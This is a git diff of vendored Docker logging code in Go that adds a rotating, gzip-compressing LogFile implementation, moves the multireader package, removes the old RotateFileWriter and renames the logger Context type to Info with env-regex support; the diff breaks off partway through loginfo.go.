--- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go
@@ -1,10 +1,10 @@
-package loggerutils
+package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils"
 
 import (
 	"bytes"
 
 	"github.com/docker/docker/daemon/logger"
-	"github.com/docker/docker/utils/templates"
+	"github.com/docker/docker/daemon/logger/templates"
 )
 
 // DefaultTemplate defines the defaults template logger should use.
@@ -12,8 +12,8 @@ const DefaultTemplate = "{{.ID}}"
 
 // ParseLogTag generates a context aware tag for consistency across different
 // log drivers based on the context of the running container.
-func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) {
-	tagTemplate := ctx.Config["tag"]
+func ParseLogTag(info logger.Info, defaultTemplate string) (string, error) {
+	tagTemplate := info.Config["tag"]
 	if tagTemplate == "" {
 		tagTemplate = defaultTemplate
 	}
@@ -23,7 +23,7 @@ func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) {
 		return "", err
 	}
 	buf := new(bytes.Buffer)
-	if err := tmpl.Execute(buf, &ctx); err != nil {
+	if err := tmpl.Execute(buf, &info); err != nil {
 		return "", err
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go
index e2aa4358aa..41957a8b19 100644
--- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go
@@ -1,4 +1,4 @@
-package loggerutils
+package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils"
 
 import (
 	"testing"
@@ -7,27 +7,27 @@ import (
 )
 
 func TestParseLogTagDefaultTag(t *testing.T) {
-	ctx := buildContext(map[string]string{})
-	tag, e := ParseLogTag(ctx, "{{.ID}}")
-	assertTag(t, e, tag, ctx.ID())
+	info := buildContext(map[string]string{})
+	tag, e := ParseLogTag(info, "{{.ID}}")
+	assertTag(t, e, tag, info.ID())
 }
 
 func TestParseLogTag(t *testing.T) {
-	ctx := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"})
-	tag, e := ParseLogTag(ctx, "{{.ID}}")
+	info := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"})
+	tag, e := ParseLogTag(info, "{{.ID}}")
 	assertTag(t, e, tag, "test-image/test-container/container-ab")
 }
 
 func TestParseLogTagEmptyTag(t *testing.T) {
-	ctx := buildContext(map[string]string{})
-	tag, e := ParseLogTag(ctx, "{{.DaemonName}}/{{.ID}}")
+	info := buildContext(map[string]string{})
+	tag, e := ParseLogTag(info, "{{.DaemonName}}/{{.ID}}")
 	assertTag(t, e, tag, "test-dockerd/container-ab")
 }
 
 // Helpers
 
-func buildContext(cfg map[string]string) logger.Context {
-	return logger.Context{
+func buildContext(cfg map[string]string) logger.Info {
+	return logger.Info{
 		ContainerID:        "container-abcdefghijklmnopqrstuvwxyz01234567890",
 		ContainerName:      "/test-container",
 		ContainerImageID:   "image-abcdefghijklmnopqrstuvwxyz01234567890",
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go
new file mode 100644
index 0000000000..6e3cda8648
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go
@@ -0,0 +1,666 @@
+package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils"
+
+import (
+	"bytes"
+	"compress/gzip"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils/multireader"
+	"github.com/docker/docker/pkg/filenotify"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/pubsub"
+	"github.com/docker/docker/pkg/tailfile"
+	"github.com/fsnotify/fsnotify"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+const tmpLogfileSuffix = ".tmp"
+
+// rotateFileMetadata is a metadata of the gzip header of the compressed log file
+type rotateFileMetadata struct {
+	LastTime time.Time `json:"lastTime,omitempty"`
+}
+
+// refCounter is a counter of logfile being referenced
+type refCounter struct {
+	mu      sync.Mutex
+	counter map[string]int
+}
+
+// Reference increase the reference counter for specified logfile
+func (rc *refCounter) GetReference(fileName string, openRefFile func(fileName string, exists bool) (*os.File, error)) (*os.File, error) {
+	rc.mu.Lock()
+	defer rc.mu.Unlock()
+
+	var (
+		file *os.File
+		err  error
+	)
+	_, ok := rc.counter[fileName]
+	file, err = openRefFile(fileName, ok)
+	if err != nil {
+		return nil, err
+	}
+
+	if ok {
+		rc.counter[fileName]++
+	} else if file != nil {
+		rc.counter[file.Name()] = 1
+	}
+
+	return file, nil
+}
+
+// Dereference reduce the reference counter for specified logfile
+func (rc *refCounter) Dereference(fileName string) error {
+	rc.mu.Lock()
+	defer rc.mu.Unlock()
+
+	rc.counter[fileName]--
+	if rc.counter[fileName] <= 0 {
+		delete(rc.counter, fileName)
+		err := os.Remove(fileName)
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// LogFile is Logger implementation for default Docker logging.
+type LogFile struct {
+	mu              sync.RWMutex // protects the logfile access
+	f               *os.File     // store for closing
+	closed          bool
+	rotateMu        sync.Mutex // blocks the next rotation until the current rotation is completed
+	capacity        int64      // maximum size of each file
+	currentSize     int64      // current size of the latest file
+	maxFiles        int        // maximum number of files
+	compress        bool       // whether old versions of log files are compressed
+	lastTimestamp   time.Time  // timestamp of the last log
+	filesRefCounter refCounter // keep reference-counted of decompressed files
+	notifyRotate    *pubsub.Publisher
+	marshal         logger.MarshalFunc
+	createDecoder   makeDecoderFunc
+	perms           os.FileMode
+}
+
+type makeDecoderFunc func(rdr io.Reader) func() (*logger.Message, error)
+
+// NewLogFile creates new LogFile
+func NewLogFile(logPath string, capacity int64, maxFiles int, compress bool, marshaller logger.MarshalFunc, decodeFunc makeDecoderFunc, perms os.FileMode) (*LogFile, error) {
+	log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, perms)
+	if err != nil {
+		return nil, err
+	}
+
+	size, err := log.Seek(0, os.SEEK_END)
+	if err != nil {
+		return nil, err
+	}
+
+	return &LogFile{
+		f:               log,
+		capacity:        capacity,
+		currentSize:     size,
+		maxFiles:        maxFiles,
+		compress:        compress,
+		filesRefCounter: refCounter{counter: make(map[string]int)},
+		notifyRotate:    pubsub.NewPublisher(0, 1),
+		marshal:         marshaller,
+		createDecoder:   decodeFunc,
+		perms:           perms,
+	}, nil
+}
+
+// WriteLogEntry writes the provided log message to the current log file.
+// This may trigger a rotation event if the max file/capacity limits are hit.
+func (w *LogFile) WriteLogEntry(msg *logger.Message) error {
+	b, err := w.marshal(msg)
+	if err != nil {
+		return errors.Wrap(err, "error marshalling log message")
+	}
+
+	logger.PutMessage(msg)
+
+	w.mu.Lock()
+	if w.closed {
+		w.mu.Unlock()
+		return errors.New("cannot write because the output file was closed")
+	}
+
+	if err := w.checkCapacityAndRotate(); err != nil {
+		w.mu.Unlock()
+		return err
+	}
+
+	n, err := w.f.Write(b)
+	if err == nil {
+		w.currentSize += int64(n)
+		w.lastTimestamp = msg.Timestamp
+	}
+	w.mu.Unlock()
+	return err
+}
+
+func (w *LogFile) checkCapacityAndRotate() error {
+	if w.capacity == -1 {
+		return nil
+	}
+
+	if w.currentSize >= w.capacity {
+		w.rotateMu.Lock()
+		fname := w.f.Name()
+		if err := w.f.Close(); err != nil {
+			w.rotateMu.Unlock()
+			return errors.Wrap(err, "error closing file")
+		}
+		if err := rotate(fname, w.maxFiles, w.compress); err != nil {
+			w.rotateMu.Unlock()
+			return err
+		}
+		file, err := os.OpenFile(fname, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, w.perms)
+		if err != nil {
+			w.rotateMu.Unlock()
+			return err
+		}
+		w.f = file
+		w.currentSize = 0
+		w.notifyRotate.Publish(struct{}{})
+
+		if w.maxFiles <= 1 || !w.compress {
+			w.rotateMu.Unlock()
+			return nil
+		}
+
+		go func() {
+			compressFile(fname+".1", w.lastTimestamp)
+			w.rotateMu.Unlock()
+		}()
+	}
+
+	return nil
+}
+
+func rotate(name string, maxFiles int, compress bool) error {
+	if maxFiles < 2 {
+		return nil
+	}
+
+	var extension string
+	if compress {
+		extension = ".gz"
+	}
+
+	lastFile := fmt.Sprintf("%s.%d%s", name, maxFiles-1, extension)
+	err := os.Remove(lastFile)
+	if err != nil && !os.IsNotExist(err) {
+		return errors.Wrap(err, "error removing oldest log file")
+	}
+
+	for i := maxFiles - 1; i > 1; i-- {
+		toPath := name + "." + strconv.Itoa(i) + extension
+		fromPath := name + "." + strconv.Itoa(i-1) + extension
+		if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) {
+			return err
+		}
+	}
+
+	if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	return nil
+}
+
+func compressFile(fileName string, lastTimestamp time.Time) {
+	file, err := os.Open(fileName)
+	if err != nil {
+		logrus.Errorf("Failed to open log file: %v", err)
+		return
+	}
+	defer func() {
+		file.Close()
+		err := os.Remove(fileName)
+		if err != nil {
+			logrus.Errorf("Failed to remove source log file: %v", err)
+		}
+	}()
+
+	outFile, err := os.OpenFile(fileName+".gz", os.O_CREATE|os.O_TRUNC|os.O_RDWR, 0640)
+	if err != nil {
+		logrus.Errorf("Failed to open or create gzip log file: %v", err)
+		return
+	}
+	defer func() {
+		outFile.Close()
+		if err != nil {
+			os.Remove(fileName + ".gz")
+		}
+	}()
+
+	compressWriter := gzip.NewWriter(outFile)
+	defer compressWriter.Close()
+
+	// Add the last log entry timestramp to the gzip header
+	extra := rotateFileMetadata{}
+	extra.LastTime = lastTimestamp
+	compressWriter.Header.Extra, err = json.Marshal(&extra)
+	if err != nil {
+		// Here log the error only and don't return since this is just an optimization.
+		logrus.Warningf("Failed to marshal gzip header as JSON: %v", err)
+	}
+
+	_, err = pools.Copy(compressWriter, file)
+	if err != nil {
+		logrus.WithError(err).WithField("module", "container.logs").WithField("file", fileName).Error("Error compressing log file")
+		return
+	}
+}
+
+// MaxFiles return maximum number of files
+func (w *LogFile) MaxFiles() int {
+	return w.maxFiles
+}
+
+// Close closes underlying file and signals all readers to stop.
+func (w *LogFile) Close() error {
+	w.mu.Lock()
+	defer w.mu.Unlock()
+	if w.closed {
+		return nil
+	}
+	if err := w.f.Close(); err != nil {
+		return err
+	}
+	w.closed = true
+	return nil
+}
+
+// ReadLogs decodes entries from log files and sends them the passed in watcher
+//
+// Note: Using the follow option can become inconsistent in cases with very frequent rotations and max log files is 1.
+// TODO: Consider a different implementation which can effectively follow logs under frequent rotations.
+func (w *LogFile) ReadLogs(config logger.ReadConfig, watcher *logger.LogWatcher) {
+	w.mu.RLock()
+	currentFile, err := os.Open(w.f.Name())
+	if err != nil {
+		w.mu.RUnlock()
+		watcher.Err <- err
+		return
+	}
+	defer currentFile.Close()
+
+	currentChunk, err := newSectionReader(currentFile)
+	if err != nil {
+		w.mu.RUnlock()
+		watcher.Err <- err
+		return
+	}
+
+	if config.Tail != 0 {
+		files, err := w.openRotatedFiles(config)
+		if err != nil {
+			w.mu.RUnlock()
+			watcher.Err <- err
+			return
+		}
+		w.mu.RUnlock()
+		seekers := make([]io.ReadSeeker, 0, len(files)+1)
+		for _, f := range files {
+			seekers = append(seekers, f)
+		}
+		if currentChunk.Size() > 0 {
+			seekers = append(seekers, currentChunk)
+		}
+		if len(seekers) > 0 {
+			tailFile(multireader.MultiReadSeeker(seekers...), watcher, w.createDecoder, config)
+		}
+		for _, f := range files {
+			f.Close()
+			fileName := f.Name()
+			if strings.HasSuffix(fileName, tmpLogfileSuffix) {
+				err := w.filesRefCounter.Dereference(fileName)
+				if err != nil {
+					logrus.Errorf("Failed to dereference the log file %q: %v", fileName, err)
+				}
+			}
+		}
+
+		w.mu.RLock()
+	}
+
+	if !config.Follow || w.closed {
+		w.mu.RUnlock()
+		return
+	}
+	w.mu.RUnlock()
+
+	notifyRotate := w.notifyRotate.Subscribe()
+	defer w.notifyRotate.Evict(notifyRotate)
+	followLogs(currentFile, watcher, notifyRotate, w.createDecoder, config.Since, config.Until)
+}
+
+func (w *LogFile) openRotatedFiles(config logger.ReadConfig) (files []*os.File, err error) {
+	w.rotateMu.Lock()
+	defer w.rotateMu.Unlock()
+
+	defer func() {
+		if err == nil {
+			return
+		}
+		for _, f := range files {
+			f.Close()
+			if strings.HasSuffix(f.Name(), tmpLogfileSuffix) {
+				err := os.Remove(f.Name())
+				if err != nil && !os.IsNotExist(err) {
+					logrus.Warningf("Failed to remove the logfile %q: %v", f.Name, err)
+				}
+			}
+		}
+	}()
+
+	for i := w.maxFiles; i > 1; i-- {
+		f, err := os.Open(fmt.Sprintf("%s.%d", w.f.Name(), i-1))
+		if err != nil {
+			if !os.IsNotExist(err) {
+				return nil, errors.Wrap(err, "error opening rotated log file")
+			}
+
+			fileName := fmt.Sprintf("%s.%d.gz", w.f.Name(), i-1)
+			decompressedFileName := fileName + tmpLogfileSuffix
+			tmpFile, err := w.filesRefCounter.GetReference(decompressedFileName, func(refFileName string, exists bool) (*os.File, error) {
+				if exists {
+					return os.Open(refFileName)
+				}
+				return decompressfile(fileName, refFileName, config.Since)
+			})
+
+			if err != nil {
+				if !os.IsNotExist(errors.Cause(err)) {
+					return nil, errors.Wrap(err, "error getting reference to decompressed log file")
+				}
+				continue
+			}
+			if tmpFile == nil {
+				// The log before `config.Since` does not need to read
+				break
+			}
+
+			files = append(files, tmpFile)
+			continue
+		}
+		files = append(files, f)
+	}
+
+	return files, nil
+}
+
+func decompressfile(fileName, destFileName string, since time.Time) (*os.File, error) {
+	cf, err := os.Open(fileName)
+	if err != nil {
+		return nil, errors.Wrap(err, "error opening file for decompression")
+	}
+	defer cf.Close()
+
+	rc, err := gzip.NewReader(cf)
+	if err != nil {
+		return nil, errors.Wrap(err, "error making gzip reader for compressed log file")
+	}
+	defer rc.Close()
+
+	// Extract the last log entry timestramp from the gzip header
+	extra := &rotateFileMetadata{}
+	err = json.Unmarshal(rc.Header.Extra, extra)
+	if err == nil && extra.LastTime.Before(since) {
+		return nil, nil
+	}
+
+	rs, err := os.OpenFile(destFileName, os.O_CREATE|os.O_RDWR, 0640)
+	if err != nil {
+		return nil, errors.Wrap(err, "error creating file for copying decompressed log stream")
+	}
+
+	_, err = pools.Copy(rs, rc)
+	if err != nil {
+		rs.Close()
+		rErr := os.Remove(rs.Name())
+		if rErr != nil && !os.IsNotExist(rErr) {
+			logrus.Errorf("Failed to remove the logfile %q: %v", rs.Name(), rErr)
+		}
+		return nil, errors.Wrap(err, "error while copying decompressed log stream to file")
+	}
+
+	return rs, nil
+}
+
+func newSectionReader(f *os.File) (*io.SectionReader, error) {
+	// seek to the end to get the size
+	// we'll leave this at the end of the file since section reader does not advance the reader
+	size, err := f.Seek(0, os.SEEK_END)
+	if err != nil {
+		return nil, errors.Wrap(err, "error getting current file size")
+	}
+	return io.NewSectionReader(f, 0, size), nil
+}
+
+type decodeFunc func() (*logger.Message, error)
+
+func tailFile(f io.ReadSeeker, watcher *logger.LogWatcher, createDecoder makeDecoderFunc, config logger.ReadConfig) {
+	var rdr io.Reader = f
+	if config.Tail > 0 {
+		ls, err := tailfile.TailFile(f, config.Tail)
+		if err != nil {
+			watcher.Err <- err
+			return
+		}
+		rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n")))
+	}
+
+	decodeLogLine := createDecoder(rdr)
+	for {
+		msg, err := decodeLogLine()
+		if err != nil {
+			if errors.Cause(err) != io.EOF {
+				watcher.Err <- err
+			}
+			return
+		}
+		if !config.Since.IsZero() && msg.Timestamp.Before(config.Since) {
+			continue
+		}
+		if !config.Until.IsZero() && msg.Timestamp.After(config.Until) {
+			return
+		}
+		select {
+		case <-watcher.WatchClose():
+			return
+		case watcher.Msg <- msg:
+		}
+	}
+}
+
+func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, createDecoder makeDecoderFunc, since, until time.Time) {
+	decodeLogLine := createDecoder(f)
+
+	name := f.Name()
+	fileWatcher, err := watchFile(name)
+	if err != nil {
+		logWatcher.Err <- err
+		return
+	}
+	defer func() {
+		f.Close()
+		fileWatcher.Remove(name)
+		fileWatcher.Close()
+	}()
+
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go func() {
+		select {
+		case <-logWatcher.WatchClose():
+			fileWatcher.Remove(name)
+			cancel()
+		case <-ctx.Done():
+			return
+		}
+	}()
+
+	var retries int
+	handleRotate := func() error {
+		f.Close()
+		fileWatcher.Remove(name)
+
+		// retry when the file doesn't exist
+		for retries := 0; retries <= 5; retries++ {
+			f, err = os.Open(name)
+			if err == nil || !os.IsNotExist(err) {
+				break
+			}
+		}
+		if err != nil {
+			return err
+		}
+		if err := fileWatcher.Add(name); err != nil {
+			return err
+		}
+		decodeLogLine = createDecoder(f)
+		return nil
+	}
+
+	errRetry := errors.New("retry")
+	errDone := errors.New("done")
+	waitRead := func() error {
+		select {
+		case e := <-fileWatcher.Events():
+			switch e.Op {
+			case fsnotify.Write:
+				decodeLogLine = createDecoder(f)
+				return nil
+			case fsnotify.Rename, fsnotify.Remove:
+				select {
+				case <-notifyRotate:
+				case <-ctx.Done():
+					return errDone
+				}
+				if err := handleRotate(); err != nil {
+					return err
+				}
+				return nil
+			}
+			return errRetry
+		case err := <-fileWatcher.Errors():
+			logrus.Debug("logger got error watching file: %v", err)
+			// Something happened, let's try and stay alive and create a new watcher
+			if retries <= 5 {
+				fileWatcher.Close()
+				fileWatcher, err = watchFile(name)
+				if err != nil {
+					return err
+				}
+				retries++
+				return errRetry
+			}
+			return err
+		case <-ctx.Done():
+			return errDone
+		}
+	}
+
+	handleDecodeErr := func(err error) error {
+		if errors.Cause(err) != io.EOF {
+			return err
+		}
+
+		for {
+			err := waitRead()
+			if err == nil {
+				break
+			}
+			if err == errRetry {
+				continue
+			}
+			return err
+		}
+		return nil
+	}
+
+	// main loop
+	for {
+		msg, err := decodeLogLine()
+		if err != nil {
+			if err := handleDecodeErr(err); err != nil {
+				if err == errDone {
+					return
+				}
+				// we got an unrecoverable error, so return
+				logWatcher.Err <- err
+				return
+			}
+			// ready to try again
+			continue
+		}
+
+		retries = 0 // reset retries since we've succeeded
+		if !since.IsZero() && msg.Timestamp.Before(since) {
+			continue
+		}
+		if !until.IsZero() && msg.Timestamp.After(until) {
+			return
+		}
+		select {
+		case logWatcher.Msg <- msg:
+		case <-ctx.Done():
+			logWatcher.Msg <- msg
+			for {
+				msg, err := decodeLogLine()
+				if err != nil {
+					return
+				}
+				if !since.IsZero() && msg.Timestamp.Before(since) {
+					continue
+				}
+				if !until.IsZero() && msg.Timestamp.After(until) {
+					return
+				}
+				logWatcher.Msg <- msg
+			}
+		}
+	}
+}
+
+func watchFile(name string) (filenotify.FileWatcher, error) {
+	fileWatcher, err := filenotify.New()
+	if err != nil {
+		return nil, err
+	}
+
+	logger := logrus.WithFields(logrus.Fields{
+		"module": "logger",
+		"fille":  name,
+	})
+
+	if err := fileWatcher.Add(name); err != nil {
+		logger.WithError(err).Warnf("falling back to file poller")
+		fileWatcher.Close()
+		fileWatcher = filenotify.NewPollingWatcher()
+
+		if err := fileWatcher.Add(name); err != nil {
+			fileWatcher.Close()
+			logger.WithError(err).Debugf("error watching log file for modifications")
+			return nil, err
+		}
+	}
+	return fileWatcher, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go
similarity index 92%
rename from vendor/github.com/docker/docker/pkg/ioutils/multireader.go
rename to vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go
index d7b97486c6..77980a2a0a 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go
@@ -1,4 +1,4 @@
-package ioutils
+package multireader // import "github.com/docker/docker/daemon/logger/loggerutils/multireader"
 
 import (
 	"bytes"
@@ -46,7 +46,9 @@ func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) {
 			rdrOffset := offset - tmpOffset
 			idx := i
 
-			rdr.Seek(rdrOffset, os.SEEK_SET)
+			if _, err := rdr.Seek(rdrOffset, os.SEEK_SET); err != nil {
+				return -1, err
+			}
 			// make sure all following readers are at 0
 			for _, rdr := range r.readers[i+1:] {
 				rdr.Seek(0, os.SEEK_SET)
@@ -67,7 +69,9 @@ func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) {
 			}
 			tmpOffset += s
 		}
-		r.Seek(tmpOffset+offset, os.SEEK_SET)
+		if _, err := r.Seek(tmpOffset+offset, os.SEEK_SET); err != nil {
+			return -1, err
+		}
 		return tmpOffset + offset, nil
 	case os.SEEK_CUR:
 		if r.pos == nil {
@@ -134,25 +138,10 @@ func (r *multiReadSeeker) getCurOffset() (int64, error) {
 	return totalSize, nil
 }
 
-func (r *multiReadSeeker) getOffsetToReader(rdr io.ReadSeeker) (int64, error) {
-	var offset int64
-	for _, r := range r.readers {
-		if r == rdr {
-			break
-		}
-
-		size, err := getReadSeekerSize(rdr)
-		if err != nil {
-			return -1, err
-		}
-		offset += size
-	}
-	return offset, nil
-}
-
 func (r *multiReadSeeker) Read(b []byte) (int, error) {
 	if r.pos == nil {
-		r.pos = &pos{0, 0}
+		// make sure all readers are at 0
+		r.Seek(0, os.SEEK_SET)
 	}
 
 	bLen := int64(len(b))
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go
similarity index 91%
rename from vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go
rename to vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go
index 65309a9565..2fb66ab566 100644
--- a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go
@@ -1,4 +1,4 @@
-package ioutils
+package multireader // import "github.com/docker/docker/daemon/logger/loggerutils/multireader"
 
 import (
 	"bytes"
@@ -55,6 +55,20 @@ func TestMultiReadSeekerReadAll(t *testing.T) {
 	if string(b) != expected {
 		t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected)
 	}
+
+	// The positions of some readers are not 0
+	s1.Seek(0, os.SEEK_SET)
+	s2.Seek(0, os.SEEK_END)
+	s3.Seek(0, os.SEEK_SET)
+	mr = MultiReadSeeker(s1, s2, s3)
+	b, err = ioutil.ReadAll(mr)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if string(b) != expected {
+		t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected)
+	}
 }
 
 func TestMultiReadSeekerReadEach(t *testing.T) {
@@ -191,9 +205,9 @@ func TestMultiReadSeekerCurAfterSet(t *testing.T) {
 }
 
 func TestMultiReadSeekerSmallReads(t *testing.T) {
-	readers := []io.ReadSeeker{}
+	var readers []io.ReadSeeker
 	for i := 0; i < 10; i++ {
-		integer := make([]byte, 4, 4)
+		integer := make([]byte, 4)
 		binary.BigEndian.PutUint32(integer, uint32(i))
 		readers = append(readers, bytes.NewReader(integer))
 	}
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go
deleted file mode 100644
index 99e0964aea..0000000000
--- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go
+++ /dev/null
@@ -1,124 +0,0 @@
-package loggerutils
-
-import (
-	"os"
-	"strconv"
-	"sync"
-
-	"github.com/docker/docker/pkg/pubsub"
-)
-
-// RotateFileWriter is Logger implementation for default Docker logging.
-type RotateFileWriter struct {
-	f            *os.File // store for closing
-	mu           sync.Mutex
-	capacity     int64 //maximum size of each file
-	currentSize  int64 // current size of the latest file
-	maxFiles     int   //maximum number of files
-	notifyRotate *pubsub.Publisher
-}
-
-//NewRotateFileWriter creates new RotateFileWriter
-func NewRotateFileWriter(logPath string, capacity int64, maxFiles int) (*RotateFileWriter, error) {
-	log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0640)
-	if err != nil {
-		return nil, err
-	}
-
-	size, err := log.Seek(0, os.SEEK_END)
-	if err != nil {
-		return nil, err
-	}
-
-	return &RotateFileWriter{
-		f:            log,
-		capacity:     capacity,
-		currentSize:  size,
-		maxFiles:     maxFiles,
-		notifyRotate: pubsub.NewPublisher(0, 1),
-	}, nil
-}
-
-//WriteLog write log message to File
-func (w *RotateFileWriter) Write(message []byte) (int, error) {
-	w.mu.Lock()
-	if err := w.checkCapacityAndRotate(); err != nil {
-		w.mu.Unlock()
-		return -1, err
-	}
-
-	n, err := w.f.Write(message)
-	if err == nil {
-		w.currentSize += int64(n)
-	}
-	w.mu.Unlock()
-	return n, err
-}
-
-func (w *RotateFileWriter) checkCapacityAndRotate() error {
-	if w.capacity == -1 {
-		return nil
-	}
-
-	if w.currentSize >= w.capacity {
-		name := w.f.Name()
-		if err := w.f.Close(); err != nil {
-			return err
-		}
-		if err := rotate(name, w.maxFiles); err != nil {
-			return err
-		}
-		file, err := os.OpenFile(name, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 06400)
-		if err != nil {
-			return err
-		}
-		w.f = file
-		w.currentSize = 0
-		w.notifyRotate.Publish(struct{}{})
-	}
-
-	return nil
-}
-
-func rotate(name string, maxFiles int) error {
-	if maxFiles < 2 {
-		return nil
-	}
-	for i := maxFiles - 1; i > 1; i-- {
-		toPath := name + "." + strconv.Itoa(i)
-		fromPath := name + "." + strconv.Itoa(i-1)
-		if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) {
-			return err
-		}
-	}
-
-	if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) {
-		return err
-	}
-	return nil
-}
-
-// LogPath returns the location the given writer logs to.
-func (w *RotateFileWriter) LogPath() string {
-	return w.f.Name()
-}
-
-// MaxFiles return maximum number of files
-func (w *RotateFileWriter) MaxFiles() int {
-	return w.maxFiles
-}
-
-//NotifyRotate returns the new subscriber
-func (w *RotateFileWriter) NotifyRotate() chan interface{} {
-	return w.notifyRotate.Subscribe()
-}
-
-//NotifyRotateEvict removes the specified subscriber from receiving any more messages.
-func (w *RotateFileWriter) NotifyRotateEvict(sub chan interface{}) {
-	w.notifyRotate.Evict(sub)
-}
-
-// Close closes underlying file and signals all readers to stop.
-func (w *RotateFileWriter) Close() error {
-	return w.f.Close()
-}
diff --git a/vendor/github.com/docker/docker/daemon/logger/context.go b/vendor/github.com/docker/docker/daemon/logger/loginfo.go
similarity index 54%
rename from vendor/github.com/docker/docker/daemon/logger/context.go
rename to vendor/github.com/docker/docker/daemon/logger/loginfo.go
index 085ab01a18..4c48235f5c 100644
--- a/vendor/github.com/docker/docker/daemon/logger/context.go
+++ b/vendor/github.com/docker/docker/daemon/logger/loginfo.go
@@ -1,14 +1,15 @@
-package logger
+package logger // import "github.com/docker/docker/daemon/logger"
 
 import (
 	"fmt"
 	"os"
+	"regexp"
 	"strings"
 	"time"
 )
 
-// Context provides enough information for a logging driver to do its function.
-type Context struct {
+// Info provides enough information for a logging driver to do its function.
+type Info struct {
 	Config              map[string]string
 	ContainerID         string
 	ContainerName       string
@@ -26,12 +27,12 @@ type Context struct {
 // ExtraAttributes returns the user-defined extra attributes (labels,
 // environment variables) in key-value format. This can be used by log drivers
 // that support metadata to add more context to a log.
-func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]string {
+func (info *Info) ExtraAttributes(keyMod func(string) string) (map[string]string, error) {
 	extra := make(map[string]string)
-	labels, ok := ctx.Config["labels"]
+	labels, ok := info.Config["labels"]
 	if ok && len(labels) > 0 {
 		for _, l := range strings.Split(labels, ",") {
-			if v, ok := ctx.ContainerLabels[l]; ok {
+			if v, ok := info.ContainerLabels[l]; ok {
 				if keyMod != nil {
 					l = keyMod(l)
 				}
@@ -40,14 +41,15 @@ func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]strin
 		}
 	}
 
-	env, ok := ctx.Config["env"]
-	if ok && len(env) > 0 {
-		envMapping := make(map[string]string)
-		for _, e := range ctx.ContainerEnv {
-			if kv := strings.SplitN(e, "=", 2); len(kv) == 2 {
-				envMapping[kv[0]] = kv[1]
-			}
+	envMapping := make(map[string]string)
+	for _, e := range info.ContainerEnv {
+		if kv := strings.SplitN(e, "=", 2); len(kv) == 2 {
+			envMapping[kv[0]] = kv[1]
 		}
+	}
+
+	env, ok := info.Config["env"]
+	if ok && len(env) > 0 {
 		for _, l := range strings.Split(env, ",") {
 			if v, ok := envMapping[l]; ok {
 				if keyMod != nil {
@@ -58,11 +60,27 @@ func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]strin
 		}
 	}
 
-	return extra
+	envRegex, ok := info.Config["env-regex"]
+	if ok && len(envRegex) > 0 {
+		re, err := regexp.Compile(envRegex)
+		if err != nil {
+			return nil, err
+		}
+		for k, v := range envMapping {
+			if re.MatchString(k) {
+				if keyMod != nil {
+					k = keyMod(k)
+				}
+				extra[k] = v
+			}
+		}
+	}
+
+	return extra, nil
 }
 
 // Hostname returns the hostname from the underlying OS.
-func (ctx *Context) Hostname() (string, error) {
+func (info *Info) Hostname() (string, error) {
 	hostname, err := os.Hostname()
 	if err != nil {
